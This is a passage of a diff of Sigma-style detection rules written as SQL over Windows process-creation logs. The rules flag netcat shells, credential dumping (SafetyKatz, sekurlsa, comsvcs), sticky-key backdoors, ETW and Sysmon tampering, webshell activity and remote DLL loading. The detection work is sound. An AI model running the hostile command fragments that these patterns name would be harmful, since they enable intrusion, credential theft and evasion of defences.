CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE 
'%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": 
"proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" 
cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network 
providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. 
This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE 
'\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE 
'%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE 
'%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR 